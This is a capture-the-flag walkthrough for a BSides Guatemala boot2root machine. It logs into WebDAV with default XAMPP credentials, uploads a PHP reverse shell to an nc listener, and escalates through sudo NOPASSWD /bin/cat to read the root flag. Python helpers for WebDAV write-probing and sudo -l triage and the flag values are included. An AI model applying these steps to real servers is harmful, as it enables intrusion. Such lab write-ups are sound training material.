From aldeid


Boot2root machine for the FIT and BSides Guatemala CTF.

Read user.txt and root.txt

#1 - user.txt


Nmap reveals only one open port: HTTP, on the standard port 80.

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Web enumeration

There is no robots.txt file that might have disclosed hidden locations, but dirsearch found a /webdav/ directory, which requires authentication.

Searching Google for the terms default credentials webdav leads to a page that documents the XAMPP defaults. They are meant for XAMPP rather than this Apache on Ubuntu, but why not give them a try?

Guess what? It worked with wampp:xampp!


Now authenticated, we can list the files on the WebDAV server. There is only one file, and it is the authentication file itself:

$ wget --http-user="wampp" --http-password="xampp"
$ cat passwd.dav 

Now that we have access, let's confirm whether the server allows us to PUT files:

$ curl -u "wampp:xampp" -X PUT

The file test is uploaded successfully, so the share is writable.
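As an added example (not code from the original write-up), here is the same write test in Python, generalized into a probe that checks the OPTIONS Allow header, uploads a marker file, reads it back to confirm the upload really landed, and deletes it so nothing is left on the target. The in-process mock WebDAV server, the local host and port, and the marker filename are assumptions made so the probe runs offline; the credentials and the /webdav/ path are the XAMPP defaults that worked here.

```python
"""Probe a WebDAV share for write access, then remove the test file.

Added example, not code from the original write-up. The mock server, local
host/port and marker filename are assumptions; user, password and path are
the XAMPP defaults that worked on the box.
"""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

DEMO_USER, DEMO_PASS, DEMO_PATH = "wampp", "xampp", "/webdav/"


def basic_auth(user, password):
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": "Basic " + token}


class MockDavHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for an Apache mod_dav share behind Basic auth."""
    store = {}  # path -> bytes, shared across requests

    def _authorized(self):
        if self.headers.get("Authorization") == basic_auth(DEMO_USER, DEMO_PASS)["Authorization"]:
            return True
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="webdav"')
        self.end_headers()
        return False

    def do_OPTIONS(self):
        if self._authorized():
            self.send_response(200)
            self.send_header("DAV", "1,2")
            self.send_header("Allow", "OPTIONS,GET,HEAD,PUT,DELETE,PROPFIND")
            self.end_headers()

    def do_PUT(self):
        if self._authorized():
            self.store[self.path] = self.rfile.read(int(self.headers.get("Content-Length", 0)))
            self.send_response(201)
            self.end_headers()

    def do_GET(self):
        if self._authorized():
            body = self.store.get(self.path)
            self.send_response(200 if body is not None else 404)
            self.send_header("Content-Length", str(len(body or b"")))
            self.end_headers()
            self.wfile.write(body or b"")

    def do_DELETE(self):
        if self._authorized():
            self.store.pop(self.path, None)
            self.send_response(204)
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def _request(conn, method, path, auth, body=None):
    """Send one request and fully consume the reply: (status, Allow header, body)."""
    conn.request(method, path, body=body, headers=auth)
    resp = conn.getresponse()
    return resp.status, resp.getheader("Allow", "") or "", resp.read()


def probe_webdav(host, port, path, user, password, marker="dav-write-probe.txt"):
    """OPTIONS -> PUT -> GET -> DELETE; each step runs only if the previous one passed."""
    result = {"auth_ok": False, "put_advertised": False, "put_works": False, "cleaned_up": False}
    auth = basic_auth(user, password)
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        status, allow, _ = _request(conn, "OPTIONS", path, auth)
        if status == 401:
            return result
        result["auth_ok"] = True
        result["put_advertised"] = "PUT" in {m.strip().upper() for m in allow.split(",")}
        target, body = path + marker, b"webdav write test\n"
        status, _, _ = _request(conn, "PUT", target, auth, body)
        if status not in (200, 201, 204):
            return result
        # Trust the upload only if the file reads back unchanged.
        status, _, got = _request(conn, "GET", target, auth)
        result["put_works"] = status == 200 and got == body
        # Leave nothing behind on the target.
        status, _, _ = _request(conn, "DELETE", target, auth)
        result["cleaned_up"] = status in (200, 204)
    finally:
        conn.close()
    return result


def run_demo():
    """Start the mock on a random local port; probe with wrong, then right, creds."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), MockDavHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        host, port = server.server_address[:2]
        return (probe_webdav(host, port, DEMO_PATH, DEMO_USER, "wrong"),
                probe_webdav(host, port, DEMO_PATH, DEMO_USER, DEMO_PASS))
    finally:
        server.shutdown()
        server.server_close()
```

Against a real target, call probe_webdav with the box's address instead of the mock. The read-back matters because some servers answer PUT with 2xx and silently discard the body, and the DELETE matters on an engagement: a test file left in a web root is noise for the client and a foothold for anyone else who finds it.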

Reverse shell

Let's use cadaver to upload a PHP reverse shell, pointed at our IP and port 4444:

$ cadaver
Authentication required for webdav on server `':
Username: wampp
dav:/webdav/> put shell.php
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 5491 bytes succeeded.
dav:/webdav/> quit
Connection to `' closed.

Now, open a listener on our machine:

$ rlwrap nc -nlvp 4444

Open the URL where you uploaded the PHP shell and voilà, you have a reverse shell.

$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Linux ubuntu 4.4.0-159-generic #187-Ubuntu SMP Thu Aug 1 16:28:06 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 13:47:48 up  1:56,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

User flag

Now, let’s upgrade our shell and get the flag:

$ SHELL=/bin/bash script -q /dev/null
www-data@ubuntu:/$ cd /home
www-data@ubuntu:/home$ ls
merlin  wampp
www-data@ubuntu:/home/wampp$ cd /home/merlin/
www-data@ubuntu:/home/merlin$ ls -la
total 44
drwxr-xr-x 4 merlin merlin 4096 Aug 25  2019 .
drwxr-xr-x 4 root   root   4096 Aug 25  2019 ..
-rw------- 1 merlin merlin 2377 Aug 25  2019 .bash_history
-rw-r--r-- 1 merlin merlin  220 Aug 25  2019 .bash_logout
-rw-r--r-- 1 merlin merlin 3771 Aug 25  2019 .bashrc
drwx------ 2 merlin merlin 4096 Aug 25  2019 .cache
-rw------- 1 merlin merlin   68 Aug 25  2019 .lesshst
drwxrwxr-x 2 merlin merlin 4096 Aug 25  2019 .nano
-rw-r--r-- 1 merlin merlin  655 Aug 25  2019 .profile
-rw-r--r-- 1 merlin merlin    0 Aug 25  2019 .sudo_as_admin_successful
-rw-r--r-- 1 root   root    183 Aug 25  2019 .wget-hsts
-rw-rw-r-- 1 merlin merlin   33 Aug 25  2019 user.txt
www-data@ubuntu:/home/merlin$ cat user.txt

User flag: 449b40fe93f78a938523b7e4dcd66d2a

#2 - root.txt

Checking our privileges with sudo -l reveals that www-data may run /bin/cat as root without a password. Since cat reads any file it is given, that is enough to read the root flag:

www-data@ubuntu:/home/merlin$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat
www-data@ubuntu:/home/merlin$ sudo cat /root/root.txt

Root flag: 101101ddc16b0cdf65ba0b8a7af7afa5
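A check worth automating for this last step: parse sudo -l output and flag any file-reading binary that can be run as root, since every such entry is the same arbitrary-file-read primitive that /bin/cat gave us here. This is an added example in Python, not code from the original write-up. The (ALL) NOPASSWD: /bin/cat entry in the sample is the one found on the box; the (root) /usr/bin/less, /usr/bin/find entry is constructed to show comma-separated command lists.

```python
"""Triage `sudo -l` output for binaries that read arbitrary files as root.

Added example, not part of the original write-up. The first sudoers entry in
SAMPLE is the box's real one; the second is constructed to exercise
comma-separated command lists.
"""
import re

SAMPLE = """Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat
    (root) /usr/bin/less, /usr/bin/find
"""

# Binaries whose normal job is to read and print files; run as root, each one
# is an arbitrary file read (a subset of the GTFOBins "file read" category).
FILE_READ_BINS = {"cat", "tac", "head", "tail", "less", "more", "nl", "base64"}

# "(runas) TAG: TAG: /path/cmd args, /path/cmd2" as printed by sudo -l
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.*)$")


def parse_sudo_l(text):
    """Return one dict per command listed after the 'may run' banner."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        m = ENTRY_RE.match(line) if in_cmds and line.strip() else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(ALL : ALL)" -> "ALL"
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            if cmd.strip():
                entries.append({"runas": runas, "nopasswd": "NOPASSWD" in tags,
                                "command": cmd.strip()})
    return entries


def file_read_privesc(entries):
    """Keep entries that run a file-reading binary as root (or as anyone)."""
    hits = []
    for e in entries:
        binary = e["command"].split()[0].rsplit("/", 1)[-1]
        if e["runas"] in ("ALL", "root") and binary in FILE_READ_BINS:
            hits.append({**e, "binary": binary})
    return hits


if __name__ == "__main__":
    for hit in file_read_privesc(parse_sudo_l(SAMPLE)):
        pw = "no password" if hit["nopasswd"] else "password required"
        print(f"sudo {hit['command']} <file> reads any file as root ({pw})")
```

Feed it the raw text of sudo -l from the target; a hit means /etc/shadow, private keys and the root flag are all one command away, with or without a password prompt depending on the NOPASSWD tag.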